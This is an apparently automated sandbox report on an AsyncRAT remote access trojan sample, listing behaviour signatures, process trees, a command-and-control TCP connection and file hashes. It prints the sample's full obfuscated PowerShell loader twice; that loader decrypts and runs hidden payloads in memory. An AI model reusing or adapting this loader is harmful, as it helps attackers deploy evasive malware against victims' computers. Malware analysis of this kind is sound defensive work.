Malware Analysis Report

2025-01-02 12:14

Sample ID 240417-bg88mahd46
Target 28de2826893ab7e1f2c97521e8fb8ef7.bin
SHA256 5cb19d4ad617cdb09aeacf5e400d617e72245e4596aa7117ff7eecd28a9463be
Tags
asyncrat default rat
score
10/10

Analysis Overview

score
10/10

SHA256

5cb19d4ad617cdb09aeacf5e400d617e72245e4596aa7117ff7eecd28a9463be

Threat Level: Known bad

The file 28de2826893ab7e1f2c97521e8fb8ef7.bin was found to be: Known bad.

Malicious Activity Summary

asyncrat default rat

AsyncRat

Async RAT payload

Blocklisted process makes network request

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-04-17 01:08

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-17 01:08

Reported

2024-04-17 01:10

Platform

win10v2004-20240412-en

Max time kernel

145s

Max time network

153s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat';$ZFXl='SpUNVvliUNVvtUNVv'.Replace('UNVv', ''),'GeIQUWtCIQUWurIQUWrIQUWenIQUWtPrIQUWoceIQUWssIQUW'.Replace('IQUW', ''),'MaaWJUinMaWJUoaWJUdaWJUuaWJUleaWJU'.Replace('aWJU', ''),'CLsXAreaLsXAteDLsXAeLsXAcLsXAryLsXAptLsXAoLsXArLsXA'.Replace('LsXA', ''),'CJHTlhanJHTlgeEJHTlxJHTltJHTlensJHTliJHTlonJHTl'.Replace('JHTl', ''),'EOAqclOAqcemeOAqcntOAqcAtOAqc'.Replace('OAqc', ''),'IYYGanvYYGaokYYGaeYYGa'.Replace('YYGa', ''),'DJEwBeJEwBcJEwBomJEwBprJEwBesJEwBsJEwB'.Replace('JEwB', ''),'LoFiVZaFiVZdFiVZ'.Replace('FiVZ', ''),'EnfjTctfjTcrfjTcyPfjTcofjTcinfjTctfjTc'.Replace('fjTc', ''),'TroNkUanoNkUsfoNkUooNkUrmFoNkUinoNkUalBoNkUlooNkUckoNkU'.Replace('oNkU', ''),'RPrvjePrvjaPrvjdLiPrvjnePrvjsPrvj'.Replace('Prvj', ''),'FPluNrPluNomBPluNasPluNe6PluN4PluNStPluNrPluNinPluNgPluN'.Replace('PluN', ''),'CfvCYopfvCYyfvCYTofvCY'.Replace('fvCY', '');powershell -w hidden;function DnPdg($NpRVN){$PsFdV=[System.Security.Cryptography.Aes]::Create();$PsFdV.Mode=[System.Security.Cryptography.CipherMode]::CBC;$PsFdV.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$PsFdV.Key=[System.Convert]::($ZFXl[12])('XN3NfgiFnJwaec6stVIzE/BuRsj55jkY+1Zsiukr1l4=');$PsFdV.IV=[System.Convert]::($ZFXl[12])('c4L4meGWtdx5xW7a8N8/JA==');$PQhBD=$PsFdV.($ZFXl[3])();$tJweH=$PQhBD.($ZFXl[10])($NpRVN,0,$NpRVN.Length);$PQhBD.Dispose();$PsFdV.Dispose();$tJweH;}function gsaQk($NpRVN){$XgXaM=New-Object System.IO.MemoryStream(,$NpRVN);$xWVjE=New-Object System.IO.MemoryStream;$klffI=New-Object System.IO.Compression.GZipStream($XgXaM,[IO.Compression.CompressionMode]::($ZFXl[7]));$klffI.($ZFXl[13])($xWVjE);$klffI.Dispose();$XgXaM.Dispose();$xWVjE.Dispose();$xWVjE.ToArray();}$FZeYR=[System.IO.File]::($ZFXl[11])([Console]::Title);$mGUkZ=gsaQk (DnPdg ([Convert]::($ZFXl[12])([System.Linq.Enumerable]::($ZFXl[5])($FZeYR, 5).Substring(2))));$froPR=gsaQk (DnPdg ([Convert]::($ZFXl[12])([System.Linq.Enumerable]::($ZFXl[5])($FZeYR, 6).Substring(2))));[System.Reflection.Assembly]::($ZFXl[8])([byte[]]$froPR).($ZFXl[9]).($ZFXl[6])($null,$null);[System.Reflection.Assembly]::($ZFXl[8])([byte[]]$mGUkZ).($ZFXl[9]).($ZFXl[6])($null,$null); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

Network

Country Destination Domain Proto
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
NL 193.222.96.41:4449 tcp
US 8.8.8.8:53 41.96.222.193.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 93.65.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ndeqyuyu.a2g.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-17 01:08

Reported

2024-04-17 01:10

Platform

win7-20240221-en

Max time kernel

121s

Max time network

125s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat"

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat';$ZFXl='SpUNVvliUNVvtUNVv'.Replace('UNVv', ''),'GeIQUWtCIQUWurIQUWrIQUWenIQUWtPrIQUWoceIQUWssIQUW'.Replace('IQUW', ''),'MaaWJUinMaWJUoaWJUdaWJUuaWJUleaWJU'.Replace('aWJU', ''),'CLsXAreaLsXAteDLsXAeLsXAcLsXAryLsXAptLsXAoLsXArLsXA'.Replace('LsXA', ''),'CJHTlhanJHTlgeEJHTlxJHTltJHTlensJHTliJHTlonJHTl'.Replace('JHTl', ''),'EOAqclOAqcemeOAqcntOAqcAtOAqc'.Replace('OAqc', ''),'IYYGanvYYGaokYYGaeYYGa'.Replace('YYGa', ''),'DJEwBeJEwBcJEwBomJEwBprJEwBesJEwBsJEwB'.Replace('JEwB', ''),'LoFiVZaFiVZdFiVZ'.Replace('FiVZ', ''),'EnfjTctfjTcrfjTcyPfjTcofjTcinfjTctfjTc'.Replace('fjTc', ''),'TroNkUanoNkUsfoNkUooNkUrmFoNkUinoNkUalBoNkUlooNkUckoNkU'.Replace('oNkU', ''),'RPrvjePrvjaPrvjdLiPrvjnePrvjsPrvj'.Replace('Prvj', ''),'FPluNrPluNomBPluNasPluNe6PluN4PluNStPluNrPluNinPluNgPluN'.Replace('PluN', ''),'CfvCYopfvCYyfvCYTofvCY'.Replace('fvCY', '');powershell -w hidden;function DnPdg($NpRVN){$PsFdV=[System.Security.Cryptography.Aes]::Create();$PsFdV.Mode=[System.Security.Cryptography.CipherMode]::CBC;$PsFdV.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$PsFdV.Key=[System.Convert]::($ZFXl[12])('XN3NfgiFnJwaec6stVIzE/BuRsj55jkY+1Zsiukr1l4=');$PsFdV.IV=[System.Convert]::($ZFXl[12])('c4L4meGWtdx5xW7a8N8/JA==');$PQhBD=$PsFdV.($ZFXl[3])();$tJweH=$PQhBD.($ZFXl[10])($NpRVN,0,$NpRVN.Length);$PQhBD.Dispose();$PsFdV.Dispose();$tJweH;}function gsaQk($NpRVN){$XgXaM=New-Object System.IO.MemoryStream(,$NpRVN);$xWVjE=New-Object System.IO.MemoryStream;$klffI=New-Object System.IO.Compression.GZipStream($XgXaM,[IO.Compression.CompressionMode]::($ZFXl[7]));$klffI.($ZFXl[13])($xWVjE);$klffI.Dispose();$XgXaM.Dispose();$xWVjE.Dispose();$xWVjE.ToArray();}$FZeYR=[System.IO.File]::($ZFXl[11])([Console]::Title);$mGUkZ=gsaQk (DnPdg ([Convert]::($ZFXl[12])([System.Linq.Enumerable]::($ZFXl[5])($FZeYR, 5).Substring(2))));$froPR=gsaQk (DnPdg ([Convert]::($ZFXl[12])([System.Linq.Enumerable]::($ZFXl[5])($FZeYR, 6).Substring(2))));[System.Reflection.Assembly]::($ZFXl[8])([byte[]]$froPR).($ZFXl[9]).($ZFXl[6])($null,$null);[System.Reflection.Assembly]::($ZFXl[8])([byte[]]$mGUkZ).($ZFXl[9]).($ZFXl[6])($null,$null); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network

N/A

Files
